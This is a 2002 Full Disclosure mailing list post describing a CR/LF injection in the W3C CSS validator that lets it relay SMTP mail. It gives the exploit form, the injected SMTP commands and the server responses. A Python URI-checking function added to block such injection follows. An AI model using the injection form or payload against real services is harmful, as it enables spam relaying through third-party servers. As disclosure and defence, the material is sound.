Full Disclosure mailing list archives

W3C CSS Validator -- Proxying Attack


From: mattmurphy () kc rr com (Matthew Murphy)
Date: Sat, 14 Sep 2002 15:59:51 -0500

Another vulnerability at the W3C, this time the CSS validator.  A CR/LF
injection can be performed by creating a custom form:

<!-- The textarea contents are submitted as the validator's "uri" query parameter -->
<FORM METHOD="GET" ACTION="http://jigsaw.w3.org/css-validator/validator">
<INPUT TYPE="hidden" NAME="warning" VALUE="1">
<INPUT TYPE="hidden" NAME="profile" VALUE="css2">
Commands:
<TEXTAREA STYLE="width:300px;height:300px" NAME="uri"
ONDBLCLICK="document.forms[0].submit()"></TEXTAREA>
</FORM>

And filling it in with something like:

[Begin Form]
http://mailserver:25/
HELO 127.0.0.1
MAIL FROM:me () here com
RCPT TO:you () somewhere com
DATA
This is a simple message demonstrating the W3 relaying hole
.
QUIT

[End Form]

This results in:

GET /
502 Unknown Command
HELO 127.0.0.1
250 Welcome  [138.96.249.65], pleased to meet you
MAIL FROM:me () here com
250 Sender "me () here com" OK...
RCPT TO:you () somewhere com
250 Recipient "you () somewhere com" OK...
DATA
354 Enter mail, end with "." on a line by itself
This is a simple message demonstrating the W3 relaying hole
.
250 Message accepted for delivery.
QUIT
221 Closing Session

If you relay this properly, the CSS validator will whine about the
connection being terminated by the peer (this is done immediately after the
SMTP command "QUIT" is sent).  There is a 502 error in the logs from "GET
/", but that is really unavoidable.

"The reason the mainstream is thought
of as a stream is because it is
so shallow."
                     - Author Unknown
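
As an added defensive example, not part of the original post and not W3C code: the check a fetch-by-URI service (such as a validator that retrieves the stylesheet for you) should apply to its "uri" parameter before opening any socket, so that the CR/LF-injected SMTP dialogue above is refused up front.  The allowed ports, the private-address rule and the hypothetical function name check_target_uri are assumptions about the deployment.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumptions for this example: a validator only ever needs to fetch
# stylesheets over plain HTTP(S) on the usual ports.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443, 8080}
# Any ASCII control character (CR, LF, TAB, NUL, ...) plus DEL.
CONTROL_CHARS = {chr(c) for c in range(0x00, 0x20)} | {chr(0x7F)}


def check_target_uri(uri: str) -> tuple:
    """Return (ok, reason) for a user-supplied target URI.

    The goal is to stop the fetcher's request line and headers from being
    split into extra lines, and to stop it from talking to services that are
    not web servers (port 25 in the post above) or that live inside the
    operator's own network.
    """
    # 1. Raw control characters anywhere in the value.  This must run BEFORE
    #    parsing: urllib.parse.urlsplit silently strips CR/LF/TAB, so a check
    #    on the parsed pieces would never see them.
    if any(ch in CONTROL_CHARS for ch in uri):
        return False, "control character in URI"

    # 2. Percent-encoded CR/LF, which some fetchers decode before use.
    lowered = uri.lower()
    if "%0d" in lowered or "%0a" in lowered:
        return False, "encoded CR/LF in URI"

    try:
        parts = urlsplit(uri)
    except ValueError as exc:
        return False, "unparseable URI: %s" % exc

    # 3. Only web schemes; no gopher:, ftp:, file: or bare host:port targets.
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if not parts.hostname:
        return False, "missing host"

    # 4. Only web ports; .port raises ValueError for out-of-range values.
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, "port not allowed: %d" % port

    # 5. Literal loopback/private/link-local addresses.  A hostname is let
    #    through here; resolving it and re-checking the resulting addresses
    #    (and pinning the connection to them) is left as an assumption.
    try:
        addr = ipaddress.ip_address(parts.hostname)
    except ValueError:
        addr = None
    if addr is not None and (addr.is_private or addr.is_loopback or addr.is_link_local):
        return False, "internal address"

    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs: the relaying payload from the post, the bare
    # mail-server URI, and a legitimate stylesheet URI.
    for sample in (
        "http://mailserver:25/\r\nHELO 127.0.0.1\r\nMAIL FROM:me@here.com\r\n",
        "http://mailserver:25/",
        "http://127.0.0.1/site.css",
        "http://example.org/site.css",
    ):
        print(repr(sample[:40]), "->", check_target_uri(sample))
```

The ordering matters: the control-character test comes before urlsplit because current Python versions remove tab, CR and LF from the input while parsing, so a check performed on the parsed scheme, host or path would pass the injected lines straight through to the socket.  Step 4 is what actually closes the hole in the post even where the CR/LF filtering is bypassed: with the fetcher confined to web ports, a connection to port 25 is never opened in the first place.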
